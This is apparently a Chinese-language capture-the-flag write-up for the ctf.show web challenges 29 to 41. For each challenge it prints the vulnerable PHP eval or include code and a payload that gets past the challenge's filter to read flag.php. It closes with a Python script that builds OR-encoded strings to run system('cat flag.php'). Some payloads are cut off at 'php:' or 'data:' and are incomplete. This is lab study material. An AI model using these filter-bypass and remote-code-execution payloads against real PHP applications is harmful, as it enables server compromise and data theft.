web29
分析题目代码:
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
查看文件:
?c=system('ls');
构造payload
?c=echo `nl fl''ag.php`;
web30
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
这里多过滤了system php 也可以用echo shell_exec(‘命令’),passthru(‘命令’),echo命令 执行系统命令 方法同29题 payload
?c=echo`nl fl''ag.p?p`;
web31
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
这里过滤了cat sort 和空格. 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl} %20*
嵌套异或逃逸: &符号作为连接,并且。 使用get的1作为一个参数,传给c,再给1一个赋值,这样就可以跳过对c的过滤。
payload:
?c=eval($_GET[1]);&1=system("cat flag.php");
web32
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤:flag\system\php\cat\sort\shell\小数点\空格\单引号\波浪号\echo\分号\括号
用文件包含include(),include可以无括号包含,分号;可以用?>代替
payload:
?c=include$_GET[aa]?>&aa=php:
base64解码即可
web33-36
和上题一样
payload:
?c=include$_GET[aa]?>&aa=php:
base64解码即可
web37-38
看到include函数,说明需要我们利用include函数命令执行,这里可以使用伪协议
伪协议
file:
用于访问本地文件系统,在CTF中通常用来读取本地文件
示例:http:
php:
php:
示例1:php:
示例2:http:
data:
通常可以用来执行PHP代码
示例1:http:
示例2:http:
payload:
?c=data:
web39
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用 payload:
?c=data:
web40
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
别看这里过滤了这么多,其实他过滤的括号是中文括号 payload:
?c=print_r(scandir(current(localeconv())));
?c=highlight_file(next(array_reverse(scandir(current(localeconv())))));
web41
if(isset($_POST['c'])){
$c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
eval("echo($c);");
}
}else{
highlight_file(__FILE__);
}
?>
通过源代码我们可以发现,屏蔽了数字和字母,还屏蔽了一些其他的特殊字符。屏蔽的比较多,我们可以跑脚本来生成可用字符的集合。 python脚本:
import re
import requests
if __name__ == '__main__':
url = "http://dcb26c1f-3d5b-426f-b0d9-be6fa7ffaeeb.challenge.ctf.show/"
a = []
ans1 = ""
ans2 = ""
for i in range(0, 256):
c = chr(i)
tmp = re.match(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', c, re.I)
if tmp:
continue
else:
a.append(i)
mya = "system"
myb = "cat flag.php"
def myfun(k, my):
global ans1
global ans2
for i in range(0, len(a)):
for j in range(i, len(a)):
if a[i] | a[j] == ord(my[k]):
ans1 += chr(a[i])
ans2 += chr(a[j])
return;
for k in range(0, len(mya)):
myfun(k, mya)
data1 = "(\"" + ans1 + "\"|\"" + ans2 + "\")"
ans1 = ""
ans2 = ""
for k in range(0, len(myb)):
myfun(k, myb)
data2 = "(\"" + ans1 + "\"|\"" + ans2 + "\")"
data = {"c": data1 + data2}
print(data)
r = requests.post(url=url, data=data)
print(r.text)
暂时更新到这,后面题等本菜搞懂再写
|